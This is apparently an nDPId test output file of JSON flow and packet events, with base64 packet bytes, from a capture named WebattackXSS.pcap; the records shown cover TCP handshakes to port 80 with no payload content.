+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":3,"flow_last_seen":1499347593331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347593331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0X51AAD4GZjusEAABwKgKMuXkAFAOABV1HSiKtIAQAOXg\/gAAAQEICgE7SukD5Rxe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347594595,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347594595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80FRAAD4G9XusEAABwKgKMuXyAFCOVJxwAAAAAKACchAAnQAAAgQFtAQCCAoBO0wkAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":2,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5fJ5A+8AjlSccaAScSB3+AAAAgQFtAQCCAoD5R2aATtMJAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":3,"flow_last_seen":1499347594597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347594597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00FVAAD4G9YKsEAABwKgKMuXyAFCOVJxxeQPvAYAQAOUW\/wAAAQEICgE7TCUD5R2a"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347597121,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xm5AAD4GZ2KsEAABwKgKMuYMAFDbqxDyAAAAAKACchA8MgAAAgQFtAQCCAoBO06cAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":2,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5gw3EDJr26sQ86AScSCvnwAAAgQFtAQCCAoD5SARATtOnAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":3,"flow_last_seen":1499347597122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347597122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Xm9AAD4GZ2msEAABwKgKMuYMAFDbqxDzNxAybIAQAOVOpwAAAQEICgE7TpwD5SAR"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347598383,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347598383,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jLdAAD4GORmsEAABwKgKMuYaAFCJpsNgAAAAAKACchDafwAAAgQFtAQCCAoBO0\/XAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":2,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5hrRW5D8iabDYaAScSBT1AAAAgQFtAQCCAoD5SFNATtP1wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":3,"flow_last_seen":1499347598385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347598385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jLhAAD4GOSCsEAABwKgKMuYaAFCJpsNh0VuQ\/YAQAOXy2gAAAQEICgE7T9gD5SFN"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347599663,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347599663,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjVAAD4GG5usEAABwKgKMuYoAFAgjfstAAAAAKACchAKfQAAAgQFtAQCCAoBO1EYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":2,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5igR\/+x3II37LqAScSDmcgAAAgQFtAQCCAoD5SKNATtRGAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":3,"flow_last_seen":1499347599664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347599664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjZAAD4GG6KsEAABwKgKMuYoAFAgjfsuEf\/seIAQAOWFegAAAQEICgE7URgD5SKN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347602223,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347602223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZzNAAD4GXp2sEAABwKgKMuZCAFA0xTSkAAAAAKACchC6NQAAAgQFtAQCCAoBO1OXAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":2,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5kLiWaZmNMU0paAScSAJYgAAAgQFtAQCCAoD5SUNATtTlwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":3,"flow_last_seen":1499347602224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347602224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZzRAAD4GXqSsEAABwKgKMuZCAFA0xTSl4lmmZ4AQAOWoaAAAAQEICgE7U5gD5SUN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347603507,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347603507,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rD1AAD4GGZOsEAABwKgKMuZQAFBpufjkAAAAAKACchC\/sAAAAgQFtAQCCAoBO1TZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":2,"flow_last_seen":1499347603507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5lDEx3+iabn45aAScSBR8gAAAgQFtAQCCAoD5SZOATtU2QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":3,"flow_last_seen":1499347603508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347603508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rD5AAD4GGZqsEAABwKgKMuZQAFBpufjlxMd\/o4AQAOXw+QAAAQEICgE7VNkD5SZO"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347604752,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347604752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ltJAAD4GLv6sEAABwKgKMuZeAFCga8DCAAAAAKACchC\/2wAAAgQFtAQCCAoBO1YQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":2,"flow_last_seen":1499347604752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5l5oMbaJoGvAw6AScSB2lQAAAgQFtAQCCAoD5SeFATtWEAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":3,"flow_last_seen":1499347604753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347604753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ltNAAD4GLwWsEAABwKgKMuZeAFCga8DDaDG2ioAQAOUVnQAAAQEICgE7VhAD5SeF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347606078,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347606078,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83l9AAD4G53CsEAABwKgKMuZsAFA9+okEAAAAAKACchBYsgAAAgQFtAQCCAoBO1dbAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5332,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":2,"flow_last_seen":1499347606078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5mwyfi78PfqJBaAScSDLYAAAAgQFtAQCCAoD5SjRATtXWwEDAwc="} 